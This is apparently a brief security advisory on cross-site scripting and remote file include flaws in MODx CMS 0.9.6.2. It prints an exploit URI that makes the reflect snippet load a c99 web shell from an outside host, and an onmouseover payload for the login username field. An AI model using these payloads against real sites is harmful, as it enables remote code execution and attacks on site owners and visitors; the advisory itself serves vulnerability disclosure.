MODx CMS Cross Site Scripting and Remote File Include Vulnerabilities

MODx CMS Cross Site Scripting and Remote File Include Vulnerabilities

An attacker can exploit these issues via a browser. To exploit the cross-site scripting issue, the attacker must entice an unsuspecting victim into following a malicious URI.

The following example URIs are available:

Remote File-Include:
http://www.example.com/modx-0.9.6.2/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.shellbox.com.ar/%5Bc%5D/c99.txt?

Cross-Site Scripting:
The attacker creates a malicious POST request that sets the username box to the following value: "+onmouseover=alert(400942638703)+".